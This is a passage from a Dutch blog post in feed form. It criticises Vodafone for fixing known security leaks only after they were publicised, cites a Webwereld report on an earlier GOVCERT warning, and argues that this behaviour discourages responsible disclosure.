is Vodafone er als de bliksem bij en de volgende lek is weer gedicht.&lt;br /&gt;
&lt;br /&gt;
Maar waarom &amp;nbsp;heeft Vodafone nu pas gereageerd?&lt;br /&gt;
&lt;blockquote&gt;
Volgens Hellegers heeft het bedrijf adequaat en tijdig gereageerd toen duidelijk werd dat het 
&#34;risicoprofiel&#34; veranderde door alle publiciteit. -- &lt;a 
href=&#34;http://webwereld.nl/nieuws/106147/govcert-waarschuwde-in-januari-al-voor-vodafone-lek.html&#34;&gt;Webwereld&lt;/a&gt;&lt;/blockquote&gt;
Als ik dit lees ben ik blij dat ik geen Vodafone klant ben. Blijkbaar is het niet genoeg dat je 
afweet van lekken die de staatsveiligheid in gevaar zouden kunnen brengen. Zolang het geen 
publiciteit krijgt is er blijkbaar te weinig motivatie voor Vodafone om de lek te dichten. Dat er 
voor beide lekken binnen een dag een oplossing&amp;nbsp;geïmplementeerd&amp;nbsp;kan worden geeft aan dat 
de investering niet groot geweest kan zijn.&lt;br /&gt;
&lt;br /&gt;
Moet de overheid het accepteren als een instelling al bijna een jaar (als het niet meer is) op de 
hoogte is van lekken die deze impact hebben, dat deze instelling niets doet? Ik ben van mening 
van niet. Als dit soort nalatigheid niet afgestraft wordt, waarom zou Vodafone, of elk ander 
bedrijf, dan nog de moeite nemen om dit soort problemen te voorkomen?&lt;br /&gt;
&lt;br /&gt;
Maar dat is niet het enige gevaar van deze situaties. Vodafone ontmoedigd op deze manier ook het 
netjes melden van lekken. Het is namelijk gebruikelijk voor hackers om beveiligingslekken netjes 
te melden bij het betreffende bedrijf voordat ze de lek publiceren. Het bedrijf heeft zo de kans 
om de lek te dichten voordat meer mensen mensen het kunnen misbruiken. Vodafone laat zien dat ze 
niets doen bij een nette waarschuwing. Ze nemen pas maatregelen bij gepubliceerd en gevaarlijk 
misbruik en dat gedrag is op zichzelf al gevaarlijk.
</summary>
  </entry>
</feed>